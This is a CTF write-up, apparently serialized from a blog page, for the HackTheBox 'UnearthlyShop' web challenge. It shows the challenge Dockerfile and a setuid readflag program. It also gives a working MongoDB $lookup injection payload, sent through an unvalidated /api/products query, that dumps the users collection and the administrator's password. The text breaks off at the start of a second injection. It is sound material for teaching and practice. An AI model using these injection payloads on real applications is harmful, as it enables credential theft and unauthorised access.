[{"data":1,"prerenderedAt":3323},["ShallowReactive",2],{"content-query-c1TNeG8cyf":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":3317,"_id":3318,"_source":3319,"_file":3320,"_stem":3321,"_extension":3322},"/writeups/unearthly-shop","writeups",false,"","UnearthlyShop",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"UnearthlyShop challenge, was a hard web challenge from HTB cyber apocalypse. It was about php gadgets, php deserialization and autoload function.","web,php,deserialization,gadgets,autoload","unearthly-shop","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743778740/writeups/cyber_appo_2023.webp","2023-03-23",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/unearthly-shop",{"description":10},{"title":25},"UnearthlyShop writeup",{"keywords":27},"web,php,deserialization,gadgets,autoload,htb,ctf",{"type":29,"children":30,"toc":3308},"root",[31,39,46,52,57,79,84,262,267,424,430,435,440,460,465,471,477,482,487,498,503,508,640,645,661,665,1109,1114,1119,1241,1246,1250,1256,1261,1410,1415,1420,1654,1659,1664,1988,1997,2002,2007,2221,2233,2239,2252,2264,2270,2284,2289,2294,2298,2306,2311,2316,2321,2928,2933,2938,2943,3080,3085,3142,3147,3158,3163,3174,3179,3184,3195,3204,3212,3217,3222,3228,3233,3238,3243,3253,3265,3276,3281,3292,3297,3302],{"type":32,"tag":33,"props":34,"children":36},"element","h1",{"id":35},"unearthlyshop",[37],{"type":38,"value":8},"text",{"type":32,"tag":40,"props":41,"children":43},"h2",{"id":42},"introduction",[44],{"type":38,"value":45},"Introduction",{"type":32,"tag":47,"props":48,"children":49},"p",{},[50],{"type":38,"value":51},"UnearthlyShop was a web hard challenge from HTB cyber apocalypse 2023.",{"type":32,"tag":47,"props":53,"children":54},{},[55],{"type":38,"value":56},"This challenge was in white box, meaning we have access to the source 
code of the website.",{"type":32,"tag":47,"props":58,"children":59},{},[60,62,69,71,77],{"type":38,"value":61},"We can see in the DockerFile that the flag is stored in the directory ",{"type":32,"tag":63,"props":64,"children":66},"code",{"className":65},[],[67],{"type":38,"value":68},"/root",{"type":38,"value":70}," and that they give us permission on an executable file called ",{"type":32,"tag":63,"props":72,"children":74},{"className":73},[],[75],{"type":38,"value":76},"/readflag",{"type":38,"value":78},". This gives us a hint on the type of attack we need to perform.",{"type":32,"tag":47,"props":80,"children":81},{},[82],{"type":38,"value":83},"In other words, we need to have a RCE (Remote Code Execution). Without this, we will not be able to read the flag.",{"type":32,"tag":85,"props":86,"children":88},"code-card",{"lang":87},"docker",[89],{"type":32,"tag":90,"props":91,"children":94},"pre",{"code":92,"language":87,"meta":7,"className":93,"style":7},"...\n# Setup user\nRUN useradd www\n\n# Add readflag binary\nCOPY flag.txt /root/flag\nCOPY config/readflag.c /\nRUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n\n# Copy challenge files\nCOPY challenge /www\n\n# Setup permissions\nRUN chown -R www:www /var/lib/nginx\n...\n","language-docker shiki shiki-themes vitesse-dark",[95],{"type":32,"tag":63,"props":96,"children":97},{"__ignoreMap":7},[98,110,120,135,145,154,168,181,194,202,211,224,232,241,254],{"type":32,"tag":99,"props":100,"children":103},"span",{"class":101,"line":102},"line",1,[104],{"type":32,"tag":99,"props":105,"children":107},{"style":106},"--shiki-default:#DBD7CAEE",[108],{"type":38,"value":109},"...\n",{"type":32,"tag":99,"props":111,"children":113},{"class":101,"line":112},2,[114],{"type":32,"tag":99,"props":115,"children":117},{"style":116},"--shiki-default:#758575DD",[118],{"type":38,"value":119},"# Setup 
user\n",{"type":32,"tag":99,"props":121,"children":123},{"class":101,"line":122},3,[124,130],{"type":32,"tag":99,"props":125,"children":127},{"style":126},"--shiki-default:#4D9375",[128],{"type":38,"value":129},"RUN",{"type":32,"tag":99,"props":131,"children":132},{"style":106},[133],{"type":38,"value":134}," useradd www\n",{"type":32,"tag":99,"props":136,"children":138},{"class":101,"line":137},4,[139],{"type":32,"tag":99,"props":140,"children":142},{"emptyLinePlaceholder":141},true,[143],{"type":38,"value":144},"\n",{"type":32,"tag":99,"props":146,"children":148},{"class":101,"line":147},5,[149],{"type":32,"tag":99,"props":150,"children":151},{"style":116},[152],{"type":38,"value":153},"# Add readflag binary\n",{"type":32,"tag":99,"props":155,"children":157},{"class":101,"line":156},6,[158,163],{"type":32,"tag":99,"props":159,"children":160},{"style":126},[161],{"type":38,"value":162},"COPY",{"type":32,"tag":99,"props":164,"children":165},{"style":106},[166],{"type":38,"value":167}," flag.txt /root/flag\n",{"type":32,"tag":99,"props":169,"children":171},{"class":101,"line":170},7,[172,176],{"type":32,"tag":99,"props":173,"children":174},{"style":126},[175],{"type":38,"value":162},{"type":32,"tag":99,"props":177,"children":178},{"style":106},[179],{"type":38,"value":180}," config/readflag.c /\n",{"type":32,"tag":99,"props":182,"children":184},{"class":101,"line":183},8,[185,189],{"type":32,"tag":99,"props":186,"children":187},{"style":126},[188],{"type":38,"value":129},{"type":32,"tag":99,"props":190,"children":191},{"style":106},[192],{"type":38,"value":193}," gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm 
/readflag.c\n",{"type":32,"tag":99,"props":195,"children":197},{"class":101,"line":196},9,[198],{"type":32,"tag":99,"props":199,"children":200},{"emptyLinePlaceholder":141},[201],{"type":38,"value":144},{"type":32,"tag":99,"props":203,"children":205},{"class":101,"line":204},10,[206],{"type":32,"tag":99,"props":207,"children":208},{"style":116},[209],{"type":38,"value":210},"# Copy challenge files\n",{"type":32,"tag":99,"props":212,"children":214},{"class":101,"line":213},11,[215,219],{"type":32,"tag":99,"props":216,"children":217},{"style":126},[218],{"type":38,"value":162},{"type":32,"tag":99,"props":220,"children":221},{"style":106},[222],{"type":38,"value":223}," challenge /www\n",{"type":32,"tag":99,"props":225,"children":227},{"class":101,"line":226},12,[228],{"type":32,"tag":99,"props":229,"children":230},{"emptyLinePlaceholder":141},[231],{"type":38,"value":144},{"type":32,"tag":99,"props":233,"children":235},{"class":101,"line":234},13,[236],{"type":32,"tag":99,"props":237,"children":238},{"style":116},[239],{"type":38,"value":240},"# Setup permissions\n",{"type":32,"tag":99,"props":242,"children":244},{"class":101,"line":243},14,[245,249],{"type":32,"tag":99,"props":246,"children":247},{"style":126},[248],{"type":38,"value":129},{"type":32,"tag":99,"props":250,"children":251},{"style":106},[252],{"type":38,"value":253}," chown -R www:www /var/lib/nginx\n",{"type":32,"tag":99,"props":255,"children":257},{"class":101,"line":256},15,[258],{"type":32,"tag":99,"props":259,"children":260},{"style":106},[261],{"type":38,"value":109},{"type":32,"tag":47,"props":263,"children":264},{},[265],{"type":38,"value":266},"And this is the readflag.c file:",{"type":32,"tag":85,"props":268,"children":270},{"lang":269},"c",[271],{"type":32,"tag":90,"props":272,"children":275},{"code":273,"language":269,"meta":7,"className":274,"style":7},"#include\u003Cunistd.h>\n#include\u003Cstdlib.h>\nint main()\n{\n    setuid(0);\n    system(\"cat /root/flag\");\n}\n","language-c shiki 
shiki-themes vitesse-dark",[276],{"type":32,"tag":63,"props":277,"children":278},{"__ignoreMap":7},[279,310,334,354,362,386,416],{"type":32,"tag":99,"props":280,"children":281},{"class":101,"line":102},[282,288,293,299,305],{"type":32,"tag":99,"props":283,"children":285},{"style":284},"--shiki-default:#666666",[286],{"type":38,"value":287},"#",{"type":32,"tag":99,"props":289,"children":290},{"style":126},[291],{"type":38,"value":292},"include",{"type":32,"tag":99,"props":294,"children":296},{"style":295},"--shiki-default:#C98A7D77",[297],{"type":38,"value":298},"\u003C",{"type":32,"tag":99,"props":300,"children":302},{"style":301},"--shiki-default:#C98A7D",[303],{"type":38,"value":304},"unistd.h",{"type":32,"tag":99,"props":306,"children":307},{"style":295},[308],{"type":38,"value":309},">\n",{"type":32,"tag":99,"props":311,"children":312},{"class":101,"line":112},[313,317,321,325,330],{"type":32,"tag":99,"props":314,"children":315},{"style":284},[316],{"type":38,"value":287},{"type":32,"tag":99,"props":318,"children":319},{"style":126},[320],{"type":38,"value":292},{"type":32,"tag":99,"props":322,"children":323},{"style":295},[324],{"type":38,"value":298},{"type":32,"tag":99,"props":326,"children":327},{"style":301},[328],{"type":38,"value":329},"stdlib.h",{"type":32,"tag":99,"props":331,"children":332},{"style":295},[333],{"type":38,"value":309},{"type":32,"tag":99,"props":335,"children":336},{"class":101,"line":122},[337,343,349],{"type":32,"tag":99,"props":338,"children":340},{"style":339},"--shiki-default:#CB7676",[341],{"type":38,"value":342},"int",{"type":32,"tag":99,"props":344,"children":346},{"style":345},"--shiki-default:#80A665",[347],{"type":38,"value":348}," 
main",{"type":32,"tag":99,"props":350,"children":351},{"style":284},[352],{"type":38,"value":353},"()\n",{"type":32,"tag":99,"props":355,"children":356},{"class":101,"line":137},[357],{"type":32,"tag":99,"props":358,"children":359},{"style":284},[360],{"type":38,"value":361},"{\n",{"type":32,"tag":99,"props":363,"children":364},{"class":101,"line":147},[365,370,375,381],{"type":32,"tag":99,"props":366,"children":367},{"style":345},[368],{"type":38,"value":369},"    setuid",{"type":32,"tag":99,"props":371,"children":372},{"style":284},[373],{"type":38,"value":374},"(",{"type":32,"tag":99,"props":376,"children":378},{"style":377},"--shiki-default:#4C9A91",[379],{"type":38,"value":380},"0",{"type":32,"tag":99,"props":382,"children":383},{"style":284},[384],{"type":38,"value":385},");\n",{"type":32,"tag":99,"props":387,"children":388},{"class":101,"line":156},[389,394,398,403,408,412],{"type":32,"tag":99,"props":390,"children":391},{"style":345},[392],{"type":38,"value":393},"    system",{"type":32,"tag":99,"props":395,"children":396},{"style":284},[397],{"type":38,"value":374},{"type":32,"tag":99,"props":399,"children":400},{"style":295},[401],{"type":38,"value":402},"\"",{"type":32,"tag":99,"props":404,"children":405},{"style":301},[406],{"type":38,"value":407},"cat /root/flag",{"type":32,"tag":99,"props":409,"children":410},{"style":295},[411],{"type":38,"value":402},{"type":32,"tag":99,"props":413,"children":414},{"style":284},[415],{"type":38,"value":385},{"type":32,"tag":99,"props":417,"children":418},{"class":101,"line":170},[419],{"type":32,"tag":99,"props":420,"children":421},{"style":284},[422],{"type":38,"value":423},"}\n",{"type":32,"tag":40,"props":425,"children":427},{"id":426},"recon",[428],{"type":38,"value":429},"Recon",{"type":32,"tag":47,"props":431,"children":432},{},[433],{"type":38,"value":434},"The application follows the same architecture as an ecommerce website, with a store for customers and a back office for 
administrators.",{"type":32,"tag":47,"props":436,"children":437},{},[438],{"type":38,"value":439},"The application has three services: two PHP-FPM services and a mongodb database.",{"type":32,"tag":441,"props":442,"children":443},"ul",{},[444,450,455],{"type":32,"tag":445,"props":446,"children":447},"li",{},[448],{"type":38,"value":449},"The first PHP-FPM service is used to serve the website. (store)",{"type":32,"tag":445,"props":451,"children":452},{},[453],{"type":38,"value":454},"The second PHP-FPM service is used to serve the back office. (admin)",{"type":32,"tag":445,"props":456,"children":457},{},[458],{"type":38,"value":459},"The mongodb database is used to store information about users, products, orders, etc.",{"type":32,"tag":47,"props":461,"children":462},{},[463],{"type":38,"value":464},"This is the architecture of the application:",{"type":32,"tag":466,"props":467,"children":470},"img",{"width":468,"src":469},1031,"https://user-images.githubusercontent.com/28403617/227585032-3b53b421-bf05-4a75-98ad-1bf1a662e979.png",[],{"type":32,"tag":40,"props":472,"children":474},{"id":473},"first-nosqli",[475],{"type":38,"value":476},"First NoSQLI",{"type":32,"tag":47,"props":478,"children":479},{},[480],{"type":38,"value":481},"For now, we only have access to the frontend part, the backoffice part is protected by a password.",{"type":32,"tag":47,"props":483,"children":484},{},[485],{"type":38,"value":486},"One request that caught our attention more than others:",{"type":32,"tag":85,"props":488,"children":489},{},[490],{"type":32,"tag":90,"props":491,"children":493},{"code":492},"POST /api/products HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 29\n\n[{\"$match\":{\"instock\":true}}]\n",[494],{"type":32,"tag":63,"props":495,"children":496},{"__ignoreMap":7},[497],{"type":38,"value":492},{"type":32,"tag":47,"props":499,"children":500},{},[501],{"type":38,"value":502},"$match is a MongoDB aggregation pipeline operator that matches all 
documents that meet the specified conditions.",{"type":32,"tag":47,"props":504,"children":505},{},[506],{"type":38,"value":507},"If we look at the code, we can see that the query parameter is passed straight to the database without any validation, so MongoDB operators can be injected.",{"type":32,"tag":85,"props":509,"children":511},{"land":510},"php",[512],{"type":32,"tag":90,"props":513,"children":516},{"code":514,"language":510,"meta":7,"className":515,"style":7},"public function getProducts($query)\n{\n    return $this->database->query('products', $query);\n}\n","language-php shiki shiki-themes vitesse-dark",[517],{"type":32,"tag":63,"props":518,"children":519},{"__ignoreMap":7},[520,554,561,633],{"type":32,"tag":99,"props":521,"children":522},{"class":101,"line":102},[523,528,533,538,543,549],{"type":32,"tag":99,"props":524,"children":525},{"style":339},[526],{"type":38,"value":527},"public",{"type":32,"tag":99,"props":529,"children":530},{"style":339},[531],{"type":38,"value":532}," function",{"type":32,"tag":99,"props":534,"children":535},{"style":345},[536],{"type":38,"value":537}," getProducts",{"type":32,"tag":99,"props":539,"children":540},{"style":284},[541],{"type":38,"value":542},"($",{"type":32,"tag":99,"props":544,"children":546},{"style":545},"--shiki-default:#BD976A",[547],{"type":38,"value":548},"query",{"type":32,"tag":99,"props":550,"children":551},{"style":284},[552],{"type":38,"value":553},")\n",{"type":32,"tag":99,"props":555,"children":556},{"class":101,"line":112},[557],{"type":32,"tag":99,"props":558,"children":559},{"style":284},[560],{"type":38,"value":361},{"type":32,"tag":99,"props":562,"children":563},{"class":101,"line":122},[564,569,574,580,585,590,594,598,602,607,612,616,621,625,629],{"type":32,"tag":99,"props":565,"children":566},{"style":126},[567],{"type":38,"value":568},"    return",{"type":32,"tag":99,"props":570,"children":571},{"style":284},[572],{"type":38,"value":573}," 
$",{"type":32,"tag":99,"props":575,"children":577},{"style":576},"--shiki-default:#C99076",[578],{"type":38,"value":579},"this",{"type":32,"tag":99,"props":581,"children":582},{"style":339},[583],{"type":38,"value":584},"->",{"type":32,"tag":99,"props":586,"children":587},{"style":545},[588],{"type":38,"value":589},"database",{"type":32,"tag":99,"props":591,"children":592},{"style":339},[593],{"type":38,"value":584},{"type":32,"tag":99,"props":595,"children":596},{"style":345},[597],{"type":38,"value":548},{"type":32,"tag":99,"props":599,"children":600},{"style":284},[601],{"type":38,"value":374},{"type":32,"tag":99,"props":603,"children":604},{"style":295},[605],{"type":38,"value":606},"'",{"type":32,"tag":99,"props":608,"children":609},{"style":301},[610],{"type":38,"value":611},"products",{"type":32,"tag":99,"props":613,"children":614},{"style":295},[615],{"type":38,"value":606},{"type":32,"tag":99,"props":617,"children":618},{"style":284},[619],{"type":38,"value":620},",",{"type":32,"tag":99,"props":622,"children":623},{"style":284},[624],{"type":38,"value":573},{"type":32,"tag":99,"props":626,"children":627},{"style":545},[628],{"type":38,"value":548},{"type":32,"tag":99,"props":630,"children":631},{"style":284},[632],{"type":38,"value":385},{"type":32,"tag":99,"props":634,"children":635},{"class":101,"line":137},[636],{"type":32,"tag":99,"props":637,"children":638},{"style":284},[639],{"type":38,"value":423},{"type":32,"tag":47,"props":641,"children":642},{},[643],{"type":38,"value":644},"It is therefore possible to inject MongoDB code from this request.",{"type":32,"tag":47,"props":646,"children":647},{},[648,650,659],{"type":38,"value":649},"With ",{"type":32,"tag":651,"props":652,"children":656},"a",{"href":653,"rel":654},"https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/",[655],"nofollow",[657],{"type":38,"value":658},"$lookup",{"type":38,"value":660},", it is possible to retrieve data from another MongoDB 
collection.",{"type":32,"tag":466,"props":662,"children":664},{"width":468,"src":663},"https://user-images.githubusercontent.com/28403617/227582895-e91a7105-203e-4db9-8de0-fac60f5a1a35.png",[],{"type":32,"tag":85,"props":666,"children":668},{"land":667},"json",[669],{"type":32,"tag":90,"props":670,"children":673},{"code":671,"language":667,"meta":7,"className":672,"style":7},"[\n  {\n    \"$lookup\": {\n      \"from\": \"users\", \u003C- This is the collection we want to retrieve data from\n      \"localField\": \"aaaaa\", \u003C- This is the field from the input collection\n      \"foreignField\": \"aaaaa\", \u003C- This is the field that the documents in the from collection must match\n      \"as\": \"adminData\" \u003C- This is the name of the new field that will contain the data\n    }\n  }\n]\n","language-json shiki shiki-themes vitesse-dark",[674],{"type":32,"tag":63,"props":675,"children":676},{"__ignoreMap":7},[677,685,693,721,816,893,990,1085,1093,1101],{"type":32,"tag":99,"props":678,"children":679},{"class":101,"line":102},[680],{"type":32,"tag":99,"props":681,"children":682},{"style":284},[683],{"type":38,"value":684},"[\n",{"type":32,"tag":99,"props":686,"children":687},{"class":101,"line":112},[688],{"type":32,"tag":99,"props":689,"children":690},{"style":284},[691],{"type":38,"value":692},"  {\n",{"type":32,"tag":99,"props":694,"children":695},{"class":101,"line":122},[696,702,707,711,716],{"type":32,"tag":99,"props":697,"children":699},{"style":698},"--shiki-default:#B8A96577",[700],{"type":38,"value":701},"    \"",{"type":32,"tag":99,"props":703,"children":705},{"style":704},"--shiki-default:#B8A965",[706],{"type":38,"value":658},{"type":32,"tag":99,"props":708,"children":709},{"style":698},[710],{"type":38,"value":402},{"type":32,"tag":99,"props":712,"children":713},{"style":284},[714],{"type":38,"value":715},":",{"type":32,"tag":99,"props":717,"children":718},{"style":284},[719],{"type":38,"value":720}," 
{\n",{"type":32,"tag":99,"props":722,"children":723},{"class":101,"line":137},[724,729,734,738,742,747,752,756,760,766,771,776,781,786,791,796,801,806,811],{"type":32,"tag":99,"props":725,"children":726},{"style":698},[727],{"type":38,"value":728},"      \"",{"type":32,"tag":99,"props":730,"children":731},{"style":704},[732],{"type":38,"value":733},"from",{"type":32,"tag":99,"props":735,"children":736},{"style":698},[737],{"type":38,"value":402},{"type":32,"tag":99,"props":739,"children":740},{"style":284},[741],{"type":38,"value":715},{"type":32,"tag":99,"props":743,"children":744},{"style":295},[745],{"type":38,"value":746}," \"",{"type":32,"tag":99,"props":748,"children":749},{"style":301},[750],{"type":38,"value":751},"users",{"type":32,"tag":99,"props":753,"children":754},{"style":295},[755],{"type":38,"value":402},{"type":32,"tag":99,"props":757,"children":758},{"style":284},[759],{"type":38,"value":620},{"type":32,"tag":99,"props":761,"children":763},{"style":762},"--shiki-default:#FDAEB7;--shiki-default-font-style:italic",[764],{"type":38,"value":765}," \u003C-",{"type":32,"tag":99,"props":767,"children":768},{"style":762},[769],{"type":38,"value":770}," This",{"type":32,"tag":99,"props":772,"children":773},{"style":762},[774],{"type":38,"value":775}," is",{"type":32,"tag":99,"props":777,"children":778},{"style":762},[779],{"type":38,"value":780}," the",{"type":32,"tag":99,"props":782,"children":783},{"style":762},[784],{"type":38,"value":785}," collection",{"type":32,"tag":99,"props":787,"children":788},{"style":762},[789],{"type":38,"value":790}," we",{"type":32,"tag":99,"props":792,"children":793},{"style":762},[794],{"type":38,"value":795}," want",{"type":32,"tag":99,"props":797,"children":798},{"style":762},[799],{"type":38,"value":800}," to",{"type":32,"tag":99,"props":802,"children":803},{"style":762},[804],{"type":38,"value":805}," retrieve",{"type":32,"tag":99,"props":807,"children":808},{"style":762},[809],{"type":38,"value":810}," 
data",{"type":32,"tag":99,"props":812,"children":813},{"style":762},[814],{"type":38,"value":815}," from\n",{"type":32,"tag":99,"props":817,"children":818},{"class":101,"line":147},[819,823,828,832,836,840,845,849,853,857,861,865,869,874,879,883,888],{"type":32,"tag":99,"props":820,"children":821},{"style":698},[822],{"type":38,"value":728},{"type":32,"tag":99,"props":824,"children":825},{"style":704},[826],{"type":38,"value":827},"localField",{"type":32,"tag":99,"props":829,"children":830},{"style":698},[831],{"type":38,"value":402},{"type":32,"tag":99,"props":833,"children":834},{"style":284},[835],{"type":38,"value":715},{"type":32,"tag":99,"props":837,"children":838},{"style":295},[839],{"type":38,"value":746},{"type":32,"tag":99,"props":841,"children":842},{"style":301},[843],{"type":38,"value":844},"aaaaa",{"type":32,"tag":99,"props":846,"children":847},{"style":295},[848],{"type":38,"value":402},{"type":32,"tag":99,"props":850,"children":851},{"style":284},[852],{"type":38,"value":620},{"type":32,"tag":99,"props":854,"children":855},{"style":762},[856],{"type":38,"value":765},{"type":32,"tag":99,"props":858,"children":859},{"style":762},[860],{"type":38,"value":770},{"type":32,"tag":99,"props":862,"children":863},{"style":762},[864],{"type":38,"value":775},{"type":32,"tag":99,"props":866,"children":867},{"style":762},[868],{"type":38,"value":780},{"type":32,"tag":99,"props":870,"children":871},{"style":762},[872],{"type":38,"value":873}," field",{"type":32,"tag":99,"props":875,"children":876},{"style":762},[877],{"type":38,"value":878}," from",{"type":32,"tag":99,"props":880,"children":881},{"style":762},[882],{"type":38,"value":780},{"type":32,"tag":99,"props":884,"children":885},{"style":762},[886],{"type":38,"value":887}," input",{"type":32,"tag":99,"props":889,"children":890},{"style":762},[891],{"type":38,"value":892}," 
collection\n",{"type":32,"tag":99,"props":894,"children":895},{"class":101,"line":156},[896,900,905,909,913,917,921,925,929,933,937,941,945,949,954,958,963,968,972,976,980,985],{"type":32,"tag":99,"props":897,"children":898},{"style":698},[899],{"type":38,"value":728},{"type":32,"tag":99,"props":901,"children":902},{"style":704},[903],{"type":38,"value":904},"foreignField",{"type":32,"tag":99,"props":906,"children":907},{"style":698},[908],{"type":38,"value":402},{"type":32,"tag":99,"props":910,"children":911},{"style":284},[912],{"type":38,"value":715},{"type":32,"tag":99,"props":914,"children":915},{"style":295},[916],{"type":38,"value":746},{"type":32,"tag":99,"props":918,"children":919},{"style":301},[920],{"type":38,"value":844},{"type":32,"tag":99,"props":922,"children":923},{"style":295},[924],{"type":38,"value":402},{"type":32,"tag":99,"props":926,"children":927},{"style":284},[928],{"type":38,"value":620},{"type":32,"tag":99,"props":930,"children":931},{"style":762},[932],{"type":38,"value":765},{"type":32,"tag":99,"props":934,"children":935},{"style":762},[936],{"type":38,"value":770},{"type":32,"tag":99,"props":938,"children":939},{"style":762},[940],{"type":38,"value":775},{"type":32,"tag":99,"props":942,"children":943},{"style":762},[944],{"type":38,"value":780},{"type":32,"tag":99,"props":946,"children":947},{"style":762},[948],{"type":38,"value":873},{"type":32,"tag":99,"props":950,"children":951},{"style":762},[952],{"type":38,"value":953}," that",{"type":32,"tag":99,"props":955,"children":956},{"style":762},[957],{"type":38,"value":780},{"type":32,"tag":99,"props":959,"children":960},{"style":762},[961],{"type":38,"value":962}," documents",{"type":32,"tag":99,"props":964,"children":965},{"style":762},[966],{"type":38,"value":967}," 
in",{"type":32,"tag":99,"props":969,"children":970},{"style":762},[971],{"type":38,"value":780},{"type":32,"tag":99,"props":973,"children":974},{"style":762},[975],{"type":38,"value":878},{"type":32,"tag":99,"props":977,"children":978},{"style":762},[979],{"type":38,"value":785},{"type":32,"tag":99,"props":981,"children":982},{"style":762},[983],{"type":38,"value":984}," must",{"type":32,"tag":99,"props":986,"children":987},{"style":762},[988],{"type":38,"value":989}," match\n",{"type":32,"tag":99,"props":991,"children":992},{"class":101,"line":170},[993,997,1002,1006,1010,1014,1019,1023,1027,1031,1035,1039,1044,1049,1053,1058,1062,1066,1071,1076,1080],{"type":32,"tag":99,"props":994,"children":995},{"style":698},[996],{"type":38,"value":728},{"type":32,"tag":99,"props":998,"children":999},{"style":704},[1000],{"type":38,"value":1001},"as",{"type":32,"tag":99,"props":1003,"children":1004},{"style":698},[1005],{"type":38,"value":402},{"type":32,"tag":99,"props":1007,"children":1008},{"style":284},[1009],{"type":38,"value":715},{"type":32,"tag":99,"props":1011,"children":1012},{"style":295},[1013],{"type":38,"value":746},{"type":32,"tag":99,"props":1015,"children":1016},{"style":301},[1017],{"type":38,"value":1018},"adminData",{"type":32,"tag":99,"props":1020,"children":1021},{"style":295},[1022],{"type":38,"value":402},{"type":32,"tag":99,"props":1024,"children":1025},{"style":762},[1026],{"type":38,"value":765},{"type":32,"tag":99,"props":1028,"children":1029},{"style":762},[1030],{"type":38,"value":770},{"type":32,"tag":99,"props":1032,"children":1033},{"style":762},[1034],{"type":38,"value":775},{"type":32,"tag":99,"props":1036,"children":1037},{"style":762},[1038],{"type":38,"value":780},{"type":32,"tag":99,"props":1040,"children":1041},{"style":762},[1042],{"type":38,"value":1043}," name",{"type":32,"tag":99,"props":1045,"children":1046},{"style":762},[1047],{"type":38,"value":1048}," 
of",{"type":32,"tag":99,"props":1050,"children":1051},{"style":762},[1052],{"type":38,"value":780},{"type":32,"tag":99,"props":1054,"children":1055},{"style":762},[1056],{"type":38,"value":1057}," new",{"type":32,"tag":99,"props":1059,"children":1060},{"style":762},[1061],{"type":38,"value":873},{"type":32,"tag":99,"props":1063,"children":1064},{"style":762},[1065],{"type":38,"value":953},{"type":32,"tag":99,"props":1067,"children":1068},{"style":762},[1069],{"type":38,"value":1070}," will",{"type":32,"tag":99,"props":1072,"children":1073},{"style":762},[1074],{"type":38,"value":1075}," contain",{"type":32,"tag":99,"props":1077,"children":1078},{"style":762},[1079],{"type":38,"value":780},{"type":32,"tag":99,"props":1081,"children":1082},{"style":762},[1083],{"type":38,"value":1084}," data\n",{"type":32,"tag":99,"props":1086,"children":1087},{"class":101,"line":183},[1088],{"type":32,"tag":99,"props":1089,"children":1090},{"style":284},[1091],{"type":38,"value":1092},"    }\n",{"type":32,"tag":99,"props":1094,"children":1095},{"class":101,"line":196},[1096],{"type":32,"tag":99,"props":1097,"children":1098},{"style":284},[1099],{"type":38,"value":1100},"  }\n",{"type":32,"tag":99,"props":1102,"children":1103},{"class":101,"line":204},[1104],{"type":32,"tag":99,"props":1105,"children":1106},{"style":284},[1107],{"type":38,"value":1108},"]\n",{"type":32,"tag":47,"props":1110,"children":1111},{},[1112],{"type":38,"value":1113},"If an input document does not contain the localField or the foreignField, the $lookup treats the field as having a value of null for matching purposes, which is why the non-existent field aaaaa matches every document in users.",{"type":32,"tag":47,"props":1115,"children":1116},{},[1117],{"type":38,"value":1118},"This is an SQL representation of the request:",{"type":32,"tag":85,"props":1120,"children":1122},{"lang":1121},"sql",[1123],{"type":32,"tag":90,"props":1124,"children":1127},{"code":1125,"language":1121,"meta":7,"className":1126,"style":7},"SELECT *, adminData\nFROM products\nWHERE adminData IN (\n   SELECT *\n 
  FROM users\n   WHERE null = null\n);\n","language-sql shiki shiki-themes vitesse-dark",[1128],{"type":32,"tag":63,"props":1129,"children":1130},{"__ignoreMap":7},[1131,1149,1162,1185,1198,1211,1234],{"type":32,"tag":99,"props":1132,"children":1133},{"class":101,"line":102},[1134,1139,1144],{"type":32,"tag":99,"props":1135,"children":1136},{"style":126},[1137],{"type":38,"value":1138},"SELECT",{"type":32,"tag":99,"props":1140,"children":1141},{"style":339},[1142],{"type":38,"value":1143}," *",{"type":32,"tag":99,"props":1145,"children":1146},{"style":106},[1147],{"type":38,"value":1148},", adminData\n",{"type":32,"tag":99,"props":1150,"children":1151},{"class":101,"line":112},[1152,1157],{"type":32,"tag":99,"props":1153,"children":1154},{"style":126},[1155],{"type":38,"value":1156},"FROM",{"type":32,"tag":99,"props":1158,"children":1159},{"style":106},[1160],{"type":38,"value":1161}," products\n",{"type":32,"tag":99,"props":1163,"children":1164},{"class":101,"line":122},[1165,1170,1175,1180],{"type":32,"tag":99,"props":1166,"children":1167},{"style":126},[1168],{"type":38,"value":1169},"WHERE",{"type":32,"tag":99,"props":1171,"children":1172},{"style":106},[1173],{"type":38,"value":1174}," adminData ",{"type":32,"tag":99,"props":1176,"children":1177},{"style":126},[1178],{"type":38,"value":1179},"IN",{"type":32,"tag":99,"props":1181,"children":1182},{"style":106},[1183],{"type":38,"value":1184}," (\n",{"type":32,"tag":99,"props":1186,"children":1187},{"class":101,"line":137},[1188,1193],{"type":32,"tag":99,"props":1189,"children":1190},{"style":126},[1191],{"type":38,"value":1192},"   SELECT",{"type":32,"tag":99,"props":1194,"children":1195},{"style":339},[1196],{"type":38,"value":1197}," *\n",{"type":32,"tag":99,"props":1199,"children":1200},{"class":101,"line":147},[1201,1206],{"type":32,"tag":99,"props":1202,"children":1203},{"style":126},[1204],{"type":38,"value":1205},"   
FROM",{"type":32,"tag":99,"props":1207,"children":1208},{"style":106},[1209],{"type":38,"value":1210}," users\n",{"type":32,"tag":99,"props":1212,"children":1213},{"class":101,"line":156},[1214,1219,1224,1229],{"type":32,"tag":99,"props":1215,"children":1216},{"style":126},[1217],{"type":38,"value":1218},"   WHERE",{"type":32,"tag":99,"props":1220,"children":1221},{"style":126},[1222],{"type":38,"value":1223}," null",{"type":32,"tag":99,"props":1225,"children":1226},{"style":339},[1227],{"type":38,"value":1228}," =",{"type":32,"tag":99,"props":1230,"children":1231},{"style":126},[1232],{"type":38,"value":1233}," null\n",{"type":32,"tag":99,"props":1235,"children":1236},{"class":101,"line":170},[1237],{"type":32,"tag":99,"props":1238,"children":1239},{"style":106},[1240],{"type":38,"value":385},{"type":32,"tag":47,"props":1242,"children":1243},{},[1244],{"type":38,"value":1245},"This allows us to retrieve the administrator's password.",{"type":32,"tag":466,"props":1247,"children":1249},{"width":468,"src":1248},"https://user-images.githubusercontent.com/28403617/227583798-02661604-c9b8-4e10-a47a-841e6d3e6b38.png",[],{"type":32,"tag":40,"props":1251,"children":1253},{"id":1252},"second-nosqli",[1254],{"type":38,"value":1255},"Second NoSQLI",{"type":32,"tag":47,"props":1257,"children":1258},{},[1259],{"type":38,"value":1260},"By analyzing the code, we quickly realize that another request also has no protection.",{"type":32,"tag":85,"props":1262,"children":1263},{"lang":510},[1264],{"type":32,"tag":90,"props":1265,"children":1267},{"code":1266,"language":510,"meta":7,"className":515,"style":7},"public function updateUser($data)\n{\n  return $this->database->update('users', $data['_id'], 
